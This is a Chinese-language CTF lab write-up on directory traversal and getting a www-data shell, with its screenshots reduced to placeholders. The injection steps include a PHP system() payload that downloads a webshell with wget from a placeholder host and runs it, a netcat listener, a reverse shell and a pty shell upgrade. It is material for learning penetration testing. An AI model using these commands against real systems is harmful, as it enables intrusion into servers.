zoukankan      html  css  js  c++  java
  • ctf-web-目录遍历(拿到www-data用户权限)注入思路笔记

    目录遍历漏洞介绍

    路径遍历攻击(也称为目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(..)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

    需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。

    这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

    注入步骤

    1. 信息探测:
      1. image
      2. 发现数据库管理界面image
    2. 漏洞扫描
      1. 使用owasp-zap进行扫描
        1. image
        2. image
    3. 敏感页面上传、执行shell
      1. -- dbadmin敏感目录有敏感页面,浏览器访问,使用弱口令尝试登陆;发现弱口令存在,并登陆成功!
      2. 生成webshell:
        1. imageimage

      3. 登陆页面之后查找可利用的写webshell的点;
      4. 新建数据库,数据表,字段(写入<?php system("cd /tmp;wget http:/ /ip:port/webshell.php;chmod +x webshell.php;php webshell");?> )
        1. image
        2. image
      5. 创建服务器用于靶场机器下载对应webshell:-- python -m "SimpleHTTPServer”,注意服务器端口和shell地址端口一致
      6. 创建监听:启动监听nc:nc –nlvp  端口号
      7. 执行shell:image
      8. 获得反弹shell
      9. 启动终端优化shell:python –c ‘’import pty;pty.spawn(‘/bin/bash’)
    4. 小结:
      1. image
  • 相关阅读:
    9.vue之v-show
    8.vue之计数器
    Elasticsearch日志-docker安装Elasticsearch
    Elasticsearch日志-错误记录-聚合查询
    Elasticsearch日志-yum安装Kibana
    禅道邮箱配置记录
    docker容器内安装服务
    docker容器内查看容器系统
    CentOS7防火墙配置
    Linux服务器docker运行的时间差
  • 原文地址:https://www.cnblogs.com/zw7889/p/13594878.html
Copyright © 2011-2022 走看看